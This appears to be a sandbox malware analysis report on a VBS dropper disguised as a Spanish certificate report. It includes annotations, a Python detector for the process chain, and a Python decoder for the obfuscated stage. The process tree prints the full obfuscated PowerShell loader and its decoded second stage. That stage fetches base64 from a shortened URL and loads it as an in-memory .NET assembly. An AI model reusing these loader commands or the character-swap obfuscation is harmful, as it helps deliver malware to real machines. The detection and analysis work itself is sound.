Analysis
max time kernel: 36s
max time network: 62s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 11/10/2022, 20:10
Static task: static1
Behavioral task: behavioral1
Sample: 0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs
Resource: win7-20220812-en
General
Target: 0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs
Size: 201KB
MD5: 7630029622a80a4a6563200a053ac39c
SHA1: 54bbc37e0fd0dfe0d23874c295e59fa303aac7ff
SHA256: 7310fb74edb1596430ef2e68fd3d339df540ae79e78d74895697ac81a1533204
SHA512: 03b8fde8a8d3264ae78567be466dd630951913b0ccf60c7f5430b34061e9c521350d9ed75d8984487f2f74d582365e8de89867924ab609b57ae31e0ddeb84d37
SSDEEP: 96:dyYRYFYDnYHFLvTfJZf4UbbNhtF/Zldy2ILS8414NEWUvWZ1+AN1qHk:d9ua6Ay/ATm45ZJ1qE
Malware Config
Extracted URL: https://tinyurl.com/2erph6cs
Signatures

Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  5     1676  powershell.exe
  7     1676  powershell.exe
  8     1676  powershell.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  (This is the sandbox's generic description for the heuristic; nothing else in this run points to ransomware behaviour.)

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  1176  powershell.exe
  1676  powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description               pid   Process
  Token: SeDebugPrivilege   1176  powershell.exe
  Token: SeDebugPrivilege   1676  powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  description                      pid   Process         procid_target
  PID 1652 wrote to memory of 1176 1652  WScript.exe     27   (3 events)
  PID 1176 wrote to memory of 1676 1176  powershell.exe  29   (3 events)
  The two parent/child pairs are the process chain in the tree below: WScript.exe (1652) launches powershell.exe (1176), which launches a second, hidden powershell.exe (1676).
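A small process-creation detector for the chain the WriteProcessMemory table records (WScript.exe launching powershell.exe, which launches a second powershell.exe with a hidden window, an execution-policy override and -NoProfile), written here as an added Python example; it is not part of the report or the sample. The events are constructed to mirror the tree: the PIDs 1652, 1176 and 1676 and their parents are the report's, the explorer.exe parent (PID 1000) and the benign control event (PID 2000) are assumptions, and the command lines are shortened. Note that it matches the presence of the -ExecutionPolicy flag rather than the value "Bypass": this sample passes "Bypss" and still ran (PID 1676 is the process that made the network requests).

```python
"""Flag script-host -> PowerShell -> PowerShell chains with evasion flags (added example)."""
import re
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")

# Match the switch, not its value: the sample's "-ExecutionPolicy Bypss" would slip
# past a rule that looks for the literal word "Bypass".
FLAG_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "execpolicy_override": re.compile(r"-(?:ep|ex\w*)\s+\S+", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "download_string": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "reflective_load": re.compile(r"\.Load\(|Assembly\]::Load", re.I),
}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
VBS = r"C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs"

# Constructed events mirroring the sandbox tree; command lines are abbreviated.
# PID 1000 (explorer.exe) and PID 2000 (a benign admin script) are assumptions.
EVENTS = [
    ProcEvent(1000, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1652, 1000, r"C:\Windows\System32\WScript.exe",
              '"C:\\Windows\\System32\\WScript.exe" "' + VBS + '"'),
    ProcEvent(1176, 1652, PS,
              '"' + PS + "\" -command $iUqm = 'JABS';$OWjuxD = [system.Text.Encoding]::Unicode.GetString("
              "[system.Convert]::FromBase64String($iUqm.replace('⌚⌚⌚','U')));"
              "powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD"),
    ProcEvent(1676, 1176, PS,
              '"' + PS + '" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = '
              "[system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));"
              '[system.AppDomain]::CurrentDomain.Load($DLL)"'),
    ProcEvent(2000, 1000, PS, '"' + PS + '" -NoProfile -File C:\\Scripts\\inventory.ps1'),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent, by_pid: dict) -> list:
    """Return the names of every indicator that fires for one PowerShell process."""
    hits = [name for name, rx in FLAG_PATTERNS.items() if rx.search(ev.cmdline)]
    parent = by_pid.get(ev.ppid)
    if parent is not None:
        pimg = basename(parent.image)
        if pimg in SCRIPT_HOSTS:
            hits.append("spawned_by_script_host")
        if pimg == "powershell.exe":
            hits.append("nested_powershell")
    return hits


def detect(events: list, threshold: int = 2) -> dict:
    """Map PID -> indicator list for every powershell.exe with at least `threshold` hits."""
    by_pid = {e.pid: e for e in events}
    alerts = {}
    for ev in events:
        if basename(ev.image) != "powershell.exe":
            continue
        hits = score_event(ev, by_pid)
        if len(hits) >= threshold:
            alerts[ev.pid] = hits
    return alerts


if __name__ == "__main__":
    for pid, hits in detect(EVENTS).items():
        print(pid, ", ".join(hits))
```

With a threshold of two indicators the benign -NoProfile -File invocation stays quiet while both stages of the sample fire; in production the parent check would come from the EDR's process lineage rather than a PID map built from the same event list.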
Processes

Level 1: C:\Windows\System32\WScript.exe (PID 1652)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs"
  - Suspicious use of WriteProcessMemory

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1176, parent 1652)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwATIBQgFCCvAK8AFCCvABMgEyCvACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AH⌚⌚⌚AcgBsAC4AYwBvAG0ALwAyAG⌚⌚⌚AcgBwAGgANgBjAHMAJwApACkAOwBbAHMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAG⌚⌚⌚AdAB⌚⌚⌚AHkAcABlACgAJwBOAHcAZwBvAHgATQAuAEsA⌚⌚⌚ABKAGEATgBqACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBQAF⌚⌚⌚AbABHAEsAQQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuADIAWABaAC8AcwByAG⌚⌚⌚AZgBvAG0ALwB3AG⌚⌚⌚AbgAvADQANwAuADAANQAuADMAMQAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACQAJQAmAC8ANQA2ADcA⌚⌚⌚gAkAC⌚⌚⌚A⌚⌚⌚gB⌚⌚⌚AH⌚⌚⌚AeQAiACMAZAB0AHkAaAB0AHkAZgA1ADYANgA3ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('–——¯¯—¯––¯', 'C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    Stage 1: the VBS hands PowerShell a UTF-16LE string that was base64-encoded after every letter U was swapped for the three-character run ⌚⌚⌚ (a cheap way to break static base64 detection). The script restores the U, decodes, patches the VBS's own path over the dash/macron placeholder, and re-launches PowerShell hidden with the decoded text.

    Level 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1676, parent 1176)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310 De estar de acuerdo con la información propo.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://tinyurl.com/2erph6cs'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('txt.2XZ/srefom/wen/47.05.312.19//:ptth' , $RodaCopy , '$%&/567R$%RTuy"#dtyhtyf5667' ))"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      Stage 2: downloads base64 text from the tinyurl.com URL, decodes it to a .NET assembly, loads it in memory with AppDomain.Load (nothing is written to disk for this step) and invokes NwgoxM.KPJaNj.PUlGKA with three arguments: a reversed URL, the path of the VBS, and a fixed string. The three network flows attributed to PID 1676 in the signatures come from this stage.
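To reproduce the stage-2 command from the stage-1 one-liner, the following added Python example (not the report's or the sample's own code) applies the same transformations the stage-1 script performs (put the letter U back for ⌚⌚⌚, base64-decode, UTF-16LE decode, substitute the VBS path for the placeholder), then pulls out the static indicators and reverses the first argument passed to PUlGKA, which the sample stores backwards. The blob and the VBS path are copied from the process tree above; the regular expressions used to pick the indicators out are this example's own.

```python
"""Re-derive the second PowerShell stage from the first-stage command line (added example)."""
import base64
import re

# Stage-1 argument copied verbatim from the powershell.exe (PID 1176) command line.
# The sample uses the run '⌚⌚⌚' in place of every letter 'U' and restores it before decoding.
STAGE1_BLOB = "JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwATIBQgFCCvAK8AFCCvABMgEyCvACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsAcwB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AGkAbgB5AH⌚⌚⌚AcgBsAC4AYwBvAG0ALwAyAG⌚⌚⌚AcgBwAGgANgBjAHMAJwApACkAOwBbAHMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAG⌚⌚⌚AdAB⌚⌚⌚AHkAcABlACgAJwBOAHcAZwBvAHgATQAuAEsA⌚⌚⌚ABKAGEATgBqACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBQAF⌚⌚⌚AbABHAEsAQQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuADIAWABaAC8AcwByAG⌚⌚⌚AZgBvAG0ALwB3AG⌚⌚⌚AbgAvADQANwAuADAANQAuADMAMQAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnACQAJQAmAC8ANQA2ADcA⌚⌚⌚gAkAC⌚⌚⌚A⌚⌚⌚gB⌚⌚⌚AH⌚⌚⌚AeQAiACMAZAB0AHkAaAB0AHkAZgA1ADYANgA3ACcAIAApACkA"

# The value the stage-1 script substitutes for the placeholder: the VBS's own path in the sandbox.
SCRIPT_PATH = (r"C:\Users\Admin\AppData\Local\Temp\0025632547_Reportes_Certificados_20541874651198912310"
               r" De estar de acuerdo con la información propo.vbs")


def decode_stage2(blob: str, script_path: str = SCRIPT_PATH) -> str:
    """Mirror stage 1: restore 'U', base64-decode, UTF-16LE-decode, patch in the script path."""
    text = base64.b64decode(blob.replace("⌚⌚⌚", "U")).decode("utf-16-le")
    # The decoded script opens with $RodaCopy = '<placeholder>'; stage 1 replaces that literal.
    m = re.match(r"\$RodaCopy = '([^']*)'", text)
    if m is None:
        raise ValueError("decoded text does not start with the expected $RodaCopy assignment")
    return text.replace(m.group(1), script_path)


def extract_iocs(stage2: str) -> dict:
    """Pull the static indicators out of the decoded stage: URL, type, method and Invoke() arguments."""
    urls = re.findall(r"https?://[^\s'\"()]+", stage2)
    type_name = re.search(r"GetType\('([^']+)'\)", stage2)
    method = re.search(r"GetMethod\('([^']+)'\)", stage2)
    # The Invoke() arguments are single-quoted literals inside "[object[]] ( ... ))".
    args_m = re.search(r"\[object\[\]\]\s*\((.*)\)\)", stage2, re.S)
    args = re.findall(r"'([^']*)'", args_m.group(1)) if args_m else []
    return {
        "urls": urls,
        "type_name": type_name.group(1) if type_name else None,
        "method": method.group(1) if method else None,
        "invoke_args": args,
        # The first argument is written backwards in the script; flip it to read it.
        "reversed_first_arg": args[0][::-1] if args else None,
    }


if __name__ == "__main__":
    stage2 = decode_stage2(STAGE1_BLOB)
    print(stage2)
    for key, value in extract_iocs(stage2).items():
        print(f"{key}: {value}")
```

The decoded text is the command line the sandbox logged for PID 1676, so the decoder doubles as a check that the page's blob is intact. The `[object[]]` parse is deliberately loose; it is tuned to this script and would need adjusting for a sample that passes arguments containing quotes or parentheses.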
Network
MITRE ATT&CK Enterprise v6
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 1fef7009d5d130fb62d87ea1b2434ddc
  SHA1: 3e8a7ad98f59a2b442f199791e91025eb5068791
  SHA256: cff066fb046b01c28610246655a1e04d662c7210462bb7b762c57480b02883d0
  SHA512: afd3727da06bb671c2561889329aeeaedd13e8f898dafbae2389a58d4c0514ba54cbd244eb540cdede041ba36f76680d3d6e11202616ab8867b672ab8af38bfd
  This is a Windows jump-list (CustomDestinations) file that the shell writes when a file is opened, not a payload fetched by the sample. The assembly stage 2 pulls from the tinyurl.com URL is loaded with AppDomain.Load and does not appear among the files captured in this run.